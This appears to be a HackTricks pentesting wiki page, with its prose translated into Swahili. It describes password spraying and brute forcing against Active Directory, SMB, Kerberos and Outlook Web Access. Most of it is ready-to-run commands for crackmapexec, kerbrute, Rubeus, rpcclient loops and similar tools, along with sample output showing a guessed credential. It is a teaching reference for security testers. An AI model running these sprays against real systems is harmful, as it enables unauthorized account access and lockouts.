Password Spraying / Brute Force

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Password Spraying

Mara tu unapopata majina halali ya watumiaji kadhaa unaweza kujaribu nywila za kawaida zaidi (zingatia sera ya nywila ya mazingira) na kila mmoja wa watumiaji ulioyagundua.
Kwa kawaida urefu wa nywila wa chini ni 7.

Orodha za majina ya kawaida ya watumiaji zinaweza pia kuwa na manufaa: https://github.com/insidetrust/statistically-likely-usernames

Kumbuka kwamba unaweza kufunga akaunti zingine ikiwa utajaribu nywila kadhaa zisizo sahihi (kwa kawaida zaidi ya 10).

Pata sera ya nywila

Ikiwa una baadhi ya akidi za mtumiaji au shell kama mtumiaji wa kikoa unaweza kupata sera ya nywila kwa:

bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Utekelezaji kutoka Linux (au yote)

  • Kutumia crackmapexec:
bash
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • spray (unaweza kuashiria idadi ya majaribio ili kuepuka kufungwa):
bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • Kutumia kerbrute (python) - HAIPENDIWI WAKATI MINGINE HAIFANYI KAZI
bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • Pamoja na moduli ya scanner/smb/smb_login ya Metasploit:

  • Kutumia rpcclient:
bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Kutoka Windows

  • Pamoja na Rubeus toleo lenye moduli ya brute:
bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • Pamoja na Invoke-DomainPasswordSpray (Inaweza kuunda watumiaji kutoka kwenye kikoa kwa default na itapata sera ya nywila kutoka kwenye kikoa na kupunguza majaribio kulingana na hiyo):
powershell
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

Invoke-SprayEmptyPassword

Nguvu Mbaya

bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

Kuna zana nyingi za password spraying outlook.

Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na nenosiri / orodha ndogo ya nenosiri za kupuliza.

bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

References

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks